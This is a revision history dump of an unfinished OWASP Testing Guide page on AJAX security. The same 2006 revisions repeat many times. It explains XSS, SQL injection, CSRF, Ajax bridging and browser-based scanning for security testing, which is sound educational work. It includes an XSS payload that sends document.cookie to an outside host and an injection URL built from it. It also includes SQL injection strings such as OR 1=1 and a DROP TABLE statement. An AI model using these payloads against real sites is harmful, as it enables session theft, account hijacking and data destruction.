<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Yes, it is possible for a rogue or vulnerable application to force a user to launch multiple XMLHttpRequests to a target application, but this has been possible before AJAX. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using <IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"> nested within a JavaScript loop can do the trick more effectively. If anything, I predict poorly thought out infrastructure and application design is likely to cause AJAX applications to inadvertently DOS themselves due to too frequent XMLHttpRequests.

 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks.There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives.

== Recent Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site
'''Yahoo! Mail Attack''' The Yamanner worm targeted Yahoo Mail, harvesting e-mail addresses and forwarding itself to all contacts in a user's Yahoo address book.

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==
'''Whitepapers''' 
... 
'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T18:54:49Z

Anushshetty: /* Attacks and Vulnerabilities */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
Asynchronous Javascript and XML (AJAX) is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its ecurity implications.
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database.
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Yes, it is possible for a rogue or vulnerable application to force a user to launch multiple XMLHttpRequests to a target application, but this has been possible before AJAX. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using <IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"> nested within a JavaScript loop can do the trick more effectively. If anything, I predict poorly thought out infrastructure and application design is likely to cause AJAX applications to inadvertently DOS themselves due to too frequent XMLHttpRequests.

 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks.There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives.

== Examples ==

'''MySpace Attack''' 
'''Yahoo! Mail Attack''' 

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==
'''Whitepapers''' 
... 
'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T18:41:55Z

Anushshetty: /* Attacks and Vulnerabilities */

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T18:36:37Z

Anushshetty: /* Attacks and Vulnerabilities */

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T07:15:55Z

Anushshetty: /* Attacks and Vulnerabilities */

== Introduction ==
 
Asynchronous Javascript and XML (AJAX) is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its ecurity implications.
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database.
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet.

'''MySpace Attack''' 
'''Yahoo! Mail Attack''' 

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==
'''Whitepapers''' 
... 
'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T05:28:27Z

Anushshetty: /* Attacks and Vulnerabilities */

== Introduction ==
 
Asynchronous Javascript and XML (AJAX) is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its ecurity implications.
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. Filtering user input correctly is, as always, the single most important safeguard for a web application; this is an area that traditional web applications have regularly failed to handle correctly. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database.
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection. 

'''Cross Site Request Forgery(XSRF)''' 

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==
'''Whitepapers''' 
... 
'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T05:23:45Z

Anushshetty: /* Attacks and Vulnerabilities */

== Introduction ==
 
Asynchronous Javascript and XML (AJAX) is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its ecurity implications.
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 
==Increased Attack Surface== 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. Filtering user input correctly is, as always, the single most important safeguard for a web application; this is an area that traditional web applications have regularly failed to handle correctly. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database.
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection. 

'''Cross Site Request Forgery(XSRF)''' 

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==
'''Whitepapers''' 
... 
'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T05:22:00Z

Anushshetty: /* Attacks and Vulnerabilities */

== Introduction ==
 
Asynchronous Javascript and XML (AJAX) is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its ecurity implications.
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 
'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. Filtering user input correctly is, as always, the single most important safeguard for a web application; this is an area that traditional web applications have regularly failed to handle correctly. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database.
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection. 

'''Cross Site Request Forgery(XSRF)''' 

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==
'''Whitepapers''' 
... 
'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T05:20:58Z

Anushshetty: /* Attacks and Vulnerabilities */

== Introduction ==
 
Asynchronous Javascript and XML (AJAX) is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its ecurity implications.
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 
'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. Filtering user input correctly is, as always, the single most important safeguard for a web application; this is an area that traditional web applications have regularly failed to handle correctly. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database.
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Ajax Bridging'''
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection. 

'''Cross Site Request Forgery(XSRF)''' 

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==
'''Whitepapers''' 
... 
'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T05:09:37Z

Anushshetty: /* Attacks and Vulnerabilities */

== Introduction ==
 
Asynchronous Javascript and XML (AJAX) is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its ecurity implications.
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 
'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. Filtering user input correctly is, as always, the single most important safeguard for a web application; this is an area that traditional web applications have regularly failed to handle correctly. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database.
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

